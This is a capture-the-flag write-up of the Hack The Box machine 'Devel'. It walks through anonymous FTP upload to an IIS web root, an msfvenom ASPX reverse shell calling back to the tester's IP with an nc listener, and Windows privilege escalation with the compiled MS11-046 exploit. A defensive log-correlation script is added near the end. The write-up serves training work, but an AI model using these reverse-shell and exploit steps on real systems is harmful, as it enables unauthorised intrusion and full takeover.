Devel — HTB

Vijay Singh Gurjar, published in Armour Infosec, Jan 18, 2020

IP: 10.10.10.5

NMAP

nmap -v -A -sC -oN nmap 10.10.10.5

PORT   STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 12-06-19 06:13PM 1442 cmdasp.aspx
| 03-17-17 04:37PM 689 iisstart.htm
| 12-06-19 06:09PM 6 test.txt
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

Nmap also reports that anonymous login is allowed on the FTP server.

After logging in to the FTP server anonymously, we can see that we have write permission on it.

There are some files on the FTP server; now let's check whether this directory is also served over the web.

The FTP files are accessible from the web root.

Great, so it looks like we can upload files to the server. Let’s generate an ASPX reverse shell using msfvenom and upload that.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f aspx > shell.aspx

With the reverse shell generated, let's upload it.

ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (985.4465 kB/s)

We can now access this file via the browser.

Since we set LPORT to 4444 in the payload, start a netcat listener on port 4444:

nc -lvp 4444

Now it's time to request our shell.aspx so that it executes and connects back to us:

http://10.10.10.5/shell1.aspx (open this from your browser)

We now get a shell on our nc listener.

We are only running as the IIS application pool user and do not have permission to access other users' folders,

so we need to escalate privileges.

We ran the systeminfo command to gather system information:

c:\Users>systeminfo
systeminfo

Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 25/2/2019, 12:29:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.024 MB
Available Physical Memory: 754 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 1.521 MB
Virtual Memory: In Use: 527 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5

The OS version is 6.1.7600 N/A Build 7600 (Windows 7, with no hotfixes listed).

Let's check whether this version is vulnerable to a known privilege escalation.

We found the exploit on Exploit-DB.

We downloaded and cross-compiled it with the following command:

i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

That gives us the compiled MS11-046.exe. Now the main work is to transfer it to the target machine for privilege escalation.

Remember that we have write permission on the FTP server, so we send the file over FTP again.

Upload the executable to the machine, switching the FTP session to binary mode first.

ftp> binary
200 Type set to I.
ftp> put MS11-046.exe
local: MS11-046.exe remote: MS11-046.exe
200 PORT command successful.

In the reverse shell we change to c:\inetpub\wwwroot, where the uploaded MS11-046.exe now sits.

Now we just have to run it.

Now we have administrator privileges

and can access any user's profile directory.
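The attack path above leaves a clear trace in the server's own logs: an anonymous FTP STOR of an executable file type into the web root, followed by an HTTP request for the same path. As an added example (not from the original post), the following Python correlates IIS FTP and web W3C logs to surface that pattern; the log lines are constructed, and the script assumes the FTP root and the IIS web root are the same directory, as they are on this box.

```python
import os

# IIS W3C log excerpts constructed for this example (not real logs from the box).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-01-18 10:00:01 10.10.14.4 anonymous USER anonymous 331
2020-01-18 10:00:02 10.10.14.4 anonymous STOR /shell.aspx 226
2020-01-18 10:00:03 10.10.14.4 anonymous STOR /test.txt 226
2020-01-18 10:05:00 10.10.14.4 anonymous STOR /MS11-046.exe 226
"""
WEB_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2020-01-18 10:01:00 10.10.14.4 GET /iisstart.htm 200
2020-01-18 10:01:05 10.10.14.4 GET /shell.aspx 200
"""
# File types IIS executes (or an attacker runs) once they land in the web root.
EXECUTABLE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".exe"}

def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the latest #Fields: directive."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names follow the directive
        elif line.startswith("#") or not line.strip():
            continue                           # other directives and blank lines
        else:
            records.append(dict(zip(fields, line.split())))
    return records

def _norm(path):
    # FTP logs may record "shell.aspx" while the web log records "/shell.aspx".
    return path.lstrip("/").lower()

def ftp_uploads(ftp_records):
    """Return FTP STOR records whose target has an executable extension."""
    hits = []
    for r in ftp_records:
        method = r.get("cs-method", "").split("]")[-1]   # tolerate "[1]STOR" from older IIS logs
        if method == "STOR" and os.path.splitext(r["cs-uri-stem"])[1].lower() in EXECUTABLE_EXT:
            hits.append(r)
    return hits

def correlate(ftp_records, web_records):
    """Alert on executable uploads; critical when the web server then served the same file."""
    served = {_norm(r["cs-uri-stem"]) for r in web_records}
    alerts = []
    for up in ftp_uploads(ftp_records):
        severity = "critical" if _norm(up["cs-uri-stem"]) in served else "high"
        alerts.append({"path": up["cs-uri-stem"], "user": up["cs-username"], "src": up["c-ip"], "severity": severity})
    return alerts
```

The same rule can be fed from a SIEM instead of inline strings; the fix on the server side is to take write access away from the anonymous FTP user or to point the FTP root somewhere IIS does not serve.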

We got the root flag at

C:\Users\Administrator\Desktop>type root.txt.txt
e621a0b50************728bc72b4b

We got the user flag at

C:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3a************ea70f4cb3e8

THANK YOU!!!!!!
